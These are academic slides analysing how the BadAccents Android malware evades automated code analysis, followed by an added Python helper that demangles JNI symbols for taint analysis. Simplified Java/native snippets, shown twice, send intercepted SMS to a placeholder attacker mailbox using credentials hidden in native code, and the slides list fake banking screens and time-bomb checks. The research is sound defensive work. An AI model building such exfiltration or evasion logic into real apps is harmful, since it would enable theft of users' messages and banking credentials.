How Current Android Malware Seeks to Evade Automated Code Analysis
Siegfried Rasthofer, Irfan Asrar, Stephan Huber, Eric Bodden
Technische Universität Darmstadt, Darmstadt, Germany; Fraunhofer SIT, Darmstadt, Germany; Appthority, San Francisco, USA
SECURE SOFTWARE ENGINEERING GROUP
Existing automated analysis approaches (APP -> analysis -> Security Report):
• Intent fuzzing (behavior analysis): DroidFuzzer [MoMM'13], IntentFuzzer [WODA'14], Andrubis [BADGERS'14]
• Symbolic/concolic execution: Acteve [FSE'12], Rozzle [Oakland'12]
• Inspection of the emulator: network sniffing, SMS interception, …
• Dataflow analysis: FlowDroid [PLDI'14], TaintDroid [OSDI'10]
• Machine learning: CHABADA [ICSE'14], Mudflow [ICSE'15]
• …
Is this sufficient?
Android/BadAccents infected >20,000 users.
Outline:
1. Malware components
2. Code-analysis challenges
Malware components (BadAccents):
• Activation component (triggered via SMS)
• Attack components: Fake AV (tapjacking, (un-)install), SMS interception (via e-mail), call interception, banking trojan, send SMS
• Interfaces used by the components: SMS, e-mail, HTTP, user interaction, environment
Send SMS component (uses HTTP, environment, contacts, file system):
1. Contact's phone number > 5 digits
2. Contact's phone number stored into a file
3. SMS text sent via C&C server (Internet connection necessary)
Activation component (uses SMS, environment, file system; controls SMS interception and call interception):
• Checks for incoming number +84… or +82…
• Receives commands from the C&C server
SMS interception component (uses native code, e-mail, HTTP, file system):
• SMS activation command: ak40_1 (deactivation: ak40_0)
• Reads e-mail credentials from native code
• Steals incoming SMS via e-mail and HTTP
SMS interception: e-mail credentials are split between Java and native code and pass through the file system.

Java:
    …
    user = stringUser();          // native method, implemented in the .so
    pw = stringPassword();        // native method, implemented in the .so
    saveToFile("musername", user);
    saveToFile("mpass", pw);
    …
    sendIncomingSMSViaMail(readFromFile("musername"),
                           readFromFile("mpass"));

Native (simplified JNI, as on the slide):
    jstring Java_stringUser() {
        return "attacker@malicious.com";
    }
    jstring Java_stringPassword() {
        return "superSecurePW";
    }
Banking trojan component (uses e-mail, environment, file system, time bomb, HTTP):
Shows a fake "Security Alert" dialog (CANCEL / OK), followed by a sequence of fake banking screens (labels translated from Korean): person check, security center, certificate password, secure mode, name, password, "Please enter the security card correctly", social security number, account number, account password, next / cancel.
Environment conditions checked before the attack:
• Waiting time: 30 minutes
• DER-formatted certificates on the file system
• Installed Korean banking applications
Code analysis challenges
RQ1: Can we automatically trigger malicious behavior (dynamically)?
RQ2: Can we automatically extract the e-mail credentials (statically)?
RQ1, dynamic challenge: generate proper external events (SMS -> activation component -> SMS interception)
• Specific events need to be sent
• Ordering of events is important
• Simple fuzzing approaches are not sufficient
RQ1, dynamic challenge: correct environment setup. For a single app the environment must provide: specific apps, specific files, specific contacts, time bomb (waiting time), …
RQ2, static challenge: inter-language dataflows. The credentials originate in native code, are written to files and read back before use, so the flow from the native return value to sendIncomingSMSViaMail() crosses both the Java/native boundary and the file system.

Java:
    user = stringUser();          // native method
    pw = stringPassword();        // native method
    saveToFile("musername", user);
    saveToFile("mpass", pw);
    …
    sendIncomingSMSViaMail(readFromFile("musername"),
                           readFromFile("mpass"));

Native (simplified JNI, as on the slide):
    jstring Java_stringUser() {
        return "attacker@malicious.com";
    }
    jstring Java_stringPassword() {
        return "superSecurePW";
    }
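An added example, not from the slides or the authors' tools: a Python helper that demangles the JNI export names of a native library and matches them to the app's Java native method declarations, so that a Java-side dataflow analysis can register those return values as sources instead of losing the flow at the language boundary. It goes beyond the slide's simplified Java_stringUser() by handling real JNI naming (class path, _1/_2/_3/_0XXXX escapes, overload signatures); the class com/example/mailer/Mailer, the method get_Name and the export list are constructed.

```python
import re
JNI_ESCAPES = {"1": "_", "2": ";", "3": "["}
def _decode(mangled):
    """Undo JNI name mangling: (pieces split at plain '_', text after '__' or None)."""
    pieces, cur, i = [], [], 0
    while i < len(mangled):
        ch, nxt = mangled[i], mangled[i + 1:i + 2]
        if ch != "_":
            cur.append(ch); i += 1
        elif nxt == "_":                 # '__' introduces the overload signature
            return pieces + ["".join(cur)], mangled[i + 2:]
        elif nxt in JNI_ESCAPES:         # _1 -> '_', _2 -> ';', _3 -> '['
            cur.append(JNI_ESCAPES[nxt]); i += 2
        elif nxt == "0":                 # _0XXXX -> Unicode code point
            cur.append(chr(int(mangled[i + 2:i + 6], 16))); i += 6
        else:                            # plain '_' separates package/class/method
            pieces.append("".join(cur)); cur = []; i += 1
    return pieces + ["".join(cur)], None
def demangle_jni(symbol):
    """'Java_com_x_Lib_stringUser' -> ('com/x/Lib', 'stringUser', signature or None)."""
    if not symbol.startswith("Java_"):
        return None
    pieces, sig = _decode(symbol[5:])
    if len(pieces) < 2:
        return None
    if sig is not None:
        sig = "/".join(_decode(sig)[0])   # the signature uses the same escapes
    return "/".join(pieces[:-1]), pieces[-1], sig
NATIVE_DECL = re.compile(r"\bnative\s+(\w+)\s+(\w+)\s*\(")
def native_sources(java_sources, exports):
    """Match exported JNI symbols to the Java 'native' methods they implement."""
    # Every match is a taint source: its value is produced in native code, which a
    # Java-only dataflow analysis would otherwise treat as an opaque call.
    declared = {(cls, name): ret for cls, src in java_sources.items()
                for ret, name in NATIVE_DECL.findall(src)}
    hits = []
    for sym in exports:
        d = demangle_jni(sym)
        if d and (d[0], d[1]) in declared:
            hits.append({"class": d[0], "method": d[1],
                         "returns": declared[(d[0], d[1])], "symbol": sym})
    return hits
# Constructed sample: the Java side of the SMS stealer from the slides under an
# assumed class name, and the exports 'nm -D' would list for its native library.
SAMPLE_JAVA = {"com/example/mailer/Mailer": """
    private native String stringUser();  private native String stringPassword();
    void onSms(String t) { sendIncomingSMSViaMail(stringUser(), stringPassword(), t); }"""}
SAMPLE_EXPORTS = ["JNI_OnLoad", "Java_com_example_mailer_Mailer_stringUser",
                  "Java_com_example_mailer_Mailer_stringPassword",
                  "Java_com_example_mailer_Mailer_get_1Name__Ljava_lang_String_2"]
```

Running native_sources(SAMPLE_JAVA, SAMPLE_EXPORTS) yields the two credential getters as sources; JNI_OnLoad and the undeclared get_Name export are ignored.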
Contact: Siegfried Rasthofer, Secure Software Engineering Group (EC-SPRIDE)
Email: siegfried.rasthofer@cased.de
Blog: http://sse-blog.ec-spride.de
Website: http://sse.ec-spride.de